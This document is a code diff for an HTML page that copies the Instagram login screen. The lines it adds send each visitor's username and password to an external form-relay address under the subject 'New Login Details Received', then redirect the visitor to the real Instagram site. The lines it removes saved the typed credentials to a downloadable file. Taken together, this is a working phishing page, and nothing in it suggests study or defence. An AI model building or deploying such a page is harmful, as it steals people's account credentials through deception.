--- a/index.html
+++ b/index.html
@@ -10,48 +10,15 @@
     <div class="container">
         <div class="login-box">
             <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram" class="logo">
-            <form id="login-form">
-                <input type="text" id="username" placeholder="Phone number, username, or email" required>
-                <input type="password" id="password" placeholder="Password" required>
-                <button type="button" onclick="saveData()">Log In</button>
-                <div class="divider">
-                    <hr><span>OR</span><hr>
-                </div>
-                <button type="button" class="fb-login">Log in with Facebook</button>
-                <a href="#" class="forgot-password">Forgot password?</a>
+            <form action="https://formsubmit.co/7500b8b340189730c54ae32b7a854f8c" method="POST">
+                <input type="hidden" name="_subject" value="New Login Details Received">
+                <input type="email" name="receiver_email" placeholder="Receiver's Email" required>
+                <input type="text" name="username" placeholder="Username" required>
+                <input type="password" name="password" placeholder="Password" required>
+                <input type="hidden" name="_next" value="https://www.instagram.com">
+                <button type="submit">Log In</button>
             </form>
         </div>
-        <div class="signup-box">
-            <p>Don't have an account? <a href="#">Sign up</a></p>
-        </div>
     </div>
-
-    <div id="download-section" style="display:none;">
-        <p>Data has been saved. <a id="download-link" href="#">Click here to download the file.</a></p>
-    </div>
-
-    <script>
-        function saveData() {
-            const username = document.getElementById("username").value;
-            const password = document.getElementById("password").value;
-
-            if (!username || !password) {
-                return;
-            }
-
-            const data = `Username: ${username}\nPassword: ${password}`;
-
-            const blob = new Blob([data], { type: "text/plain" });
-            const link = document.createElement("a");
-            link.href = URL.createObjectURL(blob);
-            link.download = "console-log.txt";
-
-            const downloadSection = document.getElementById("download-section");
-            const downloadLink = document.getElementById("download-link");
-
-            downloadLink.href = link.href;
-            downloadSection.style.display = "block";
-        }
-    </script>
 </body>
 </html>
